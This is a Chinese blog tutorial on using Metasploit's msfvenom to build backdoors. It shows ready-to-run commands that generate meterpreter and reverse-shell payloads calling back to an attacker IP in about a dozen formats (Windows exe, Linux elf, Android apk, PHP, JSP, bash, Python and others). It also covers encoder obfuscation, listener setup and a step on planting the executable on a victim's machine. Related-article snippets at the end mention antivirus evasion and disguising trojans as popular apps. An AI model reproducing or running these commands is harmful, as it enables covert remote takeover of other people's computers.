【MSFconsole进阶】Msfvenom后门生成模块:使用方法、shell生成、各种格式生成

最新推荐文章于 2025-03-09 16:09:25 发布
最新推荐文章于 2025-03-09 16:09:25 发布
阅读量2.1k 收藏 23
点赞数 2
分类专栏: 【工具】网络安全 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/124955098
版权

目录

一、简介:

二、命令参数

三、使用方法:

3.1、第一步:生成shell.exe

3.2、第二步:设置监听

3.3、第三步:将shell.exe植入到windows运行

3.4、第四步:get到了

四、生成shellcode

4.1、普通生成

4.2、编码生成

五、生成格式

5.1、 Windows

5.2、Linux

5.3、Mac

5.4、Android

5.5、Aspx

5.6、JSP

5.7、PHP

5.8、BASH

5.9、Python

5.10、War

5.11、Perl

5.12、Asp

一、简介:

 msfvenom是msfpayload,msfencode的结合体

可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

二、命令参数

选项:
    -l, --list            <type>        # 列出所有可用的项目,其中值可以被设置为 					payloads, encoders, nops, platforms, archs, encrypt, formats等等
    -p, --payload         <payload>     # 指定特定的 Payload,如果被设置为 - ,那么从			标准输入流中读取
        --list-options                  # 列出--payload <value> 的标准,高级和规避选			项
    -f, --format          <format>      # 指定 Payload 的输出格式(使用 --list 			formats 列出)
    -e, --encoder         <encoder>     # 指定使用的 Encoder (使用 --list encoders 			列出)
        --sec-name        <value>       # 生成大型Windows二进制文件时使用的新名称。默认			值:随机4个字符的字符串
        --smallest                      # 使用所有可用的编码器生成最小的payload
        --encrypt         <value>       # 应用于shellcode的加密或编码类型 (使用--list 			encrypt 列出)
        --encrypt-key     <value>       # 用于加密的密钥
        --encrypt-iv      <value>       # 加密的初始化向量
    -a, --arch            <arch>        # 指定目标系统架构(使用 --list archs  列出)
        --platform        <platform>    # 指定目标系统平台 (使用 --list platforms 列			出)
    -o, --out             <path>        # 保存payload文件
    -b, --bad-chars       <list>        # 设置需要在 Payload 中避免出现的字符,如: 			'\x00\xff'
    -n, --nopsled         <length>      # 指定 nop 在 payload 中的数量
    -s, --space           <length>      # 设置未经编码的 Payload 的最大长度
        --encoder-space   <length>      # 编码后的 Payload 的最大长度
    -i, --iterations      <count>       # 设置 Payload 的编码次数
    -c, --add-code        <path>        # 指定包含一个额外的win32 shellcode文件
    -x, --template        <path>        # 指定一个特定的可执行文件作为模板
    -k, --keep                          # 保护模板程序的功能,注入的payload作为一个新的			进程运行
    -v, --var-name        <value>       # 指定一个变量名(当添加 -f 参数的时候,例如 -f 			python,那么输出为 python 代码, payload 会被按行格式化为 python 代码,追加到			一个 python变量中,这个参数即为指定 python 变量的变量名)
    -t, --timeout         <second>      # 设置从STDIN读取payload的等待时间(默认为			30,0为禁用)
    -h, --help                          # 帮助

三、使用方法:

(以Windows为例)

3.1、第一步:生成shell.exe

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.190.131 LPORT=9999 -f exe -o /root/shell.exe

 (还可以加上 -e 加上编码器……)

3.2、第二步:设置监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.190.131

set LPORT 9999

run

 处于等待状态了

3.3、第三步:将shell.exe植入到windows运行

各显神通……

然后等待监听状态

就会监听到运行shell.exe的电脑

3.4、第四步:get到了

执行各种……

四、生成shellcode

4.1、普通生成

msfvenom -p 有效载荷 -f 输出格式 -o 输出文件

msfvenom -p windows/meterpreter/reverse_tcp -f exe -o /root/payload.exe

4.2、编码生成

msfvenom -a 系统架构 --platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.190.131 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o /root/payload.exe

 

五、生成格式

5.1、 Windows

msfvenom -a x86 --platform windows  -p windows/meterpreter/reverse_tcp -i 3  LHOST=192.168.190.131 lport=4444 -e x86/shikata_ga_nai -f exe -o /root/payload.exe

5.2、Linux

msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp  lhost=192.168.190.131 lport=4444 -f elf -o /root/payload.elf

5.3、Mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp lhost=192.168.190.131 port=4444 -f macho -o payload.macho

5.4、Android

msfvenom -p android/meterpreter/reverse_tcp -o /root/payload.apk

5.5、Aspx

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.190.131 lport=4444 -f aspx -o /root/payload.aspx

5.6、JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.190.131 lport=4444 -f raw -o /root/payload.jsp

5.7、PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.190.131 lport=4444 -f raw -o /root/payload.php

5.8、BASH

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.190.131 lport=4444 -f raw -o /root/shell.sh

5.9、Python

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.190.131 port=4444 -f raw -o /root/shell.py

5.10、War

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.131 lport=4444 -f war

5.11、Perl

msfvenom -p cmd/unix/reverse_perl lhost=192.168.190.131 lport=4444 -f perl

5.12、Asp

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.131 port=4444 -f asp

使用MSF生成shellcode
weixin_34092455的博客
04-02 1123
使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
msfvenom 生成shellcode
nethm的专栏
09-20 7982
先来看下msfvenomd的帮助 root@localhost:~# msfvenom -h Error: MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] O
木马免杀之MSFVenom制作木马
最新发布
没有网络安全就没有国家安全
03-09 1433
木马免杀之MSFVenom制作木马
MSF-Shellcode生成使用
weixin_34301307的博客
11-12 4796
1使用环境 Kali 2.0 msfvenom 2Msfvenom参数说明 msfvenom –h 查看帮助 说明: Options: -p, --payload <payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&...
MSF 生成shell命令
baidu_126894的博客
10-20 1761
MSF 生成在 Linux 下反弹的 Meterpreter Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell MSF 生成反弹 Shell (C Shellcode)...
msfvenom生成shell
向阳-Y.的博客
03-06 515
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connec
掌握Metasploit框架的进阶Shell技巧
Metasploit还包含了一个名为msfconsole的命令行界面,它是框架的主要交互方式,通过它,安全研究员可以加载和使用各种模块。另外,Metasploit还提供了图形用户界面版本的工具如Armitage,以及命令行工具如msfvenom,...
Metasploit载荷生成使用指南
它提供了一系列易于使用的工具和资源,能够帮助用户发现、验证和利用各种安全漏洞。 ## 1.2 Metasploit的历史 Metasploit项目最初由H.D. Moore于2003年发起,最初是一个单一的网络安全工具,随着时间的推移,...
Metasploit的进阶用法
05-09
可以使用msfvenom生成自定义Payload,并使用msfconsole进行连接和攻击。 2. 使用Exploit模块:Metasploit中有很多Exploit模块,可以使用这些模块来攻击漏洞。可以使用search命令搜索可用的Exploit模块,然后使用use...
内网渗透测试高级技巧:Metasploit进阶应用详解
[内网渗透测试高级技巧:Metasploit进阶应用详解](https://cdn.educba.com/academy/wp-content/uploads/2021/04/Metasploit-Framework.jpg) # 1. 内网渗透测试概述 内网渗透测试是信息安全领域中的一项重要技术,它...
网络安全之路:我的系统性渗透测试学习框架
03-19 1965
没有兴趣,何来就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦! 写在前面: 1.业界比较好的信息安全网站: freebuff:这个看来你已经找到了 secWiKi:ennnnn 安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有
4.1 MSF 制作shellcode,且运行
qq_55202378的博客
08-25 4652
msf shellcode
用MSF生成windows系统后门程序
gcsdsh的博客
03-26 677
Metasploit框架提供了一个全面的工具集,包括扫描器、利用工具、Payload生成器等,使安全专业人员能够模拟攻击并评估目标系统的安全性。MSF(全名msfconsole)是Metasploit的一个模块,可以执行扫描、利用漏洞、生成Payload以及执行各种其他操作来评估和测试目标系统的安全性。这样就算功,接下来只需让靶机运行该后门程序,给kali开启apache,可以让靶机直接下载生成的程序。由于这里的靶机是虚拟机,没有摄像头,就不做演示了,还可以执行很多命令,可以用help查看。
msf生成windows后门程序
Deeeelete的博客
02-04 2945
进入文件夹,我们先要把我们需要制作后门程序的正常exe文件拖进去 在此处打开终端,确保该路径存在这个exe文件! 输入命令 msfvenom -a x86 --platform widows -p windows/meterpreter/reverse_tcp LHOST=192.168.132.133 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i ...
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 1229
是msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
代码审计
04-22 2602
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms 支持平台 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f
msf-Msfvenonm生成后门木马
热门推荐
weixin_45588247的博客
08-27 2万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1131
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
利用Msfvenom获取WindowsShell
DoubleJing的博客
07-18 495
一、在kali主机上利用msfvenom生成windows端的安装程序(exe文件),程序名最好取一个大家经常安装的程序,如腾讯视频、爱奇艺等。(1)由于生成的程序可能会被杀毒软件识别,我们比较一下使用单个编码器生成的程序与用两个编码器生成的程序,哪个更容易被识别。此时我们已经获取到主机地址为192.168.137.133的shell,我们可以利用dos命令进行相应的操作。二、将生成的两个exe文件下载到物理机,使用ssh客户端连接kali主机,利用sz工具下载两个exe文件。六、查看是否建立连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值